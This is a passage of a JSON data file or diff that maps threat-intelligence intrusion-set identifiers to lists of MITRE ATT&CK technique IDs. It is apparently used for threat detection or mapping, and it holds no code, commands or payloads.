"attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1573.002" + }, + { + "mitreAttackId": "attack.t1055.004" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0": [ + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1027.005" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1055.012" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1587.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1197" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1102.001" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--dc6fe6ee-04c2-49be-ba3d-f38d2463c02a": [ + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1220" + }, + { + "mitreAttackId": "attack.t1037.001" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1572" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1218.008" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1218.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1573.002" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9": [ + { + "mitreAttackId": "attack.t1069" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1546.008" + }, + { + "mitreAttackId": "attack.t1104" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1027.005" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1110.002" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1098" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1095" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--c5b81590-6814-4d2a-8baa-15c4b6c7f960": [ + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1069.001" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1059.006" + } + ], + "intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af": [ + { + "mitreAttackId": "attack.t1597" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1594" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1593.001" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80": [ + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1197" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1115" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1090.001" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1553.006" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1547.009" + }, + { + "mitreAttackId": "attack.t1546.010" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1056" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd": [ + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1069.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090.003" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662": [ + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1550.002" + }, + { + "mitreAttackId": "attack.t1114.001" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1496" + }, + { + "mitreAttackId": "attack.t1134" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1574.012" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa": [ + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1091" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1587.001" + } + ], + "intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1036.007" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1052.001" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1564.001" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1218.004" + }, + { + "mitreAttackId": "attack.t1560.003" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1608" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1091" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1": [ + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022": [ + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1070.004" + } + ], + "intrusion-set--abc5a1d4-f0dc-49d1-88a1-4a80e478bb03": [ + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--c21dd6f1-1364-4a70-a1f7-783080ec34ee": [ + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1585" + }, + { + "mitreAttackId": "attack.t1546.008" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1213" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1530" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1572" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1021.005" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1217" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1039" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1555.005" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27": [ + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1547.009" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1055.012" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1055.002" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133": [ + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1566" + }, + { + "mitreAttackId": "attack.t1027" + } + ], + "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12": [ + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1218.001" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1547.001" + } + ], + "intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1070.004" + } + ], + "intrusion-set--c5574ca0-d5a4-490a-b207-e4658e5fd1d7": [ + { + "mitreAttackId": "attack.t1036.002" + } + ], + "intrusion-set--94873029-f950-4268-9cfd-5032e15cb182": [ + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1568.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40": [ + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1056.001" + } + ], + "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d": [ + { + "mitreAttackId": "attack.t1201" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1008" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1027.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1497.001" + }, + { + "mitreAttackId": "attack.t1069.002" + }, + { + "mitreAttackId": "attack.t1069.001" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1218.001" + }, + { + "mitreAttackId": "attack.t1137.004" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1572" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1573.002" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1555.004" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1094" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1003.005" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1486" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1071.002" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1008" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1574.006" + }, + { + "mitreAttackId": "attack.t1070.003" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1110.002" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1197" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1546.008" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1104" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1218.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1014" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1496" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1102.001" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1480.001" + }, + { + "mitreAttackId": 